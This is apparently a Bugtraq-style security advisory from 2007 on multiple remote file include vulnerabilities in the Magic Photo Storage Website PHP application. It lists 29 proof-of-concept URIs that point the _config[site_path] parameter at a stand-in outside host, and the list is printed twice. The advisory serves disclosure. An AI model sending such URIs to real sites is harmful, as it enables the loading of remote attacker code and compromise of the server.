Magic Photo Storage Website Multiple Remote File Include Vulnerabilities
BID:21965
Info
Magic Photo Storage Website Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 21965 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 09 2007 12:00AM |
| Updated: | Jan 10 2007 05:40PM |
| Credit: | IbnuSina is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Magic Photo Storage Website Magic Photo Storage Website 0 |
| Not Vulnerable: | |
Discussion
Magic Photo Storage Website Multiple Remote File Include Vulnerabilities
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Exploit / POC
Magic Photo Storage Website Multiple Remote File Include Vulnerabilities
An attacker can exploit these issues via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/path/admin/admin_password.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/admin/add_welcome_text.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/admin/admin_email.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/admin/add_templates.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/admin/admin_paypal_email.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/admin/approve_member.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/admin/delete_member.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/admin/index.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/admin/list_members.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/admin/membership_pricing.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/admin/send_email.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/include/config.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/include/db_config.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/include/common_function.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/add_category.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/add_news.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/change_catalog_template.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/couple_milestone.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/couple_profile.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/delete_category.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/index.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/login.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/logout.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/register.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/upload_photo.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/user_catelog_password.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/user_email.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/user_extend.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/user_membership_password.php?_config[site_path]=http://www.example2.com
An attacker can exploit these issues via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/path/admin/admin_password.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/admin/add_welcome_text.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/admin/admin_email.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/admin/add_templates.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/admin/admin_paypal_email.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/admin/approve_member.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/admin/delete_member.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/admin/index.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/admin/list_members.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/admin/membership_pricing.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/admin/send_email.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/include/config.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/include/db_config.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/include/common_function.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/add_category.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/add_news.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/change_catalog_template.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/couple_milestone.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/couple_profile.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/delete_category.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/index.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/login.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/logout.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/register.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/upload_photo.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/user_catelog_password.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/user_email.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/user_extend.php?_config[site_path]=http://www.example2.com
http://www.example.com/path/user/user_membership_password.php?_config[site_path]=http://www.example2.com
Solution / Fix
Magic Photo Storage Website Multiple Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
References
Magic Photo Storage Website Multiple Remote File Include Vulnerabilities
References:
References:
- Magic Photo Storage Website Homepage (Magic Photo Storage Website)
- magic photo storage website Multiple Remote File Inclusion ([email protected])